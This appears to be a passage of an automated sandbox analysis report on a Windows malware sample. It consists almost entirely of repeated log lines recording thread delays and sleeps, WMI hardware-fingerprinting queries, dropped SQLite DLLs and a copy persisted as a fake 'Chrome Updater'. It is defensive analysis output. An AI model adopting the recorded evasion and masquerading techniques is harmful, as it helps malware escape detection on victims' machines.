        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598344Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598234Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598125Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598015Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597906Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597797Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597687Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597578Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597469Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597313Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597203Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597094Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596984Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596644Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596516Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596406Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596297Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596188Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596078Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595969Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595859Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595640Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595531Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595422Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595312Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595203Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595092Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594984Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594656Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594547Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594438Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599656Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599217Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599109Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598891Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598641Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598530Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598394Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598266Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598153Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597876Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597734Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597613Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595625Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595516Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595405Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595297Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595186Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595076Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594964Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594859Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594639Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594531Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594421Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594309Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594201Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594094Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593984Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593873Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593719Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593590Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593483Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593375Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593265Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593156Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593047Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592937Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592828Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592718Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592609Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592500Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592390Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592281Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592170Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592061Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591953Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591844Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow / User API: threadDelayed 1554Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow / User API: threadDelayed 8254Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeWindow / User API: threadDelayed 6586Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeWindow / User API: threadDelayed 1557Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeDropped PE file which has not been started: C:\Users\user\Desktop\System.Data.SQLite.Linq.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeDropped PE file which has not been started: C:\Users\user\Desktop\System.Data.SQLite.EF6.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeDropped PE file which has not been started: C:\Users\user\Desktop\System.Data.SQLite.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeAPI coverage: 1.2 %
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -29514790517935264s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599891s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599773s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599671s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599559s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599362s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599234s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599125s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -599010s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598906s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598682s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598578s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598469s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598344s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598234s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598125s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -598015s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597906s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597687s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597578s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597469s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597313s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597203s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -597094s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596984s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596875s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596766s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596644s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596516s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596406s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596297s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596188s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -596078s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595969s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595859s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595750s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595640s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595531s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595422s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595312s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595203s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -595092s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594984s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594875s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594766s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594656s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594547s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594438s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exe TID: 4152Thread sleep time: -594328s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -23980767295822402s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 29232Thread sleep count: 6586 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599875s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 29232Thread sleep count: 1557 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599766s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599656s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599546s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599437s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599328s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599217s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599109s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -599000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598891s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598766s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598641s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598530s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598394s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598266s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -598153s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -597876s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -597734s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -597613s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595750s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595625s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595516s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595405s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595297s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595186s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -595076s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594964s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594859s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 32192Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594750s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594639s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594531s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594421s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594309s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594201s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -594094s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593984s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593873s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593719s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593590s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593483s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593375s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593265s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593156s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -593047s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592937s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592828s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592718s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592609s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592390s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592281s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592170s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -592061s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -591953s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe TID: 28948Thread sleep time: -591844s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DE0B5 FindFirstFileExA,0_2_6C3DE0B5
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C4D87A0 GetSystemInfo,0_2_6C4D87A0
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599891Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599773Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599671Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599559Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599362Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599234Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599125Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599010Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598906Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598797Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598682Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598344Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598234Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598125Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598015Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597906Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597797Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597687Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597578Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597469Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597313Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597203Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 597094Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596984Jump to behavior
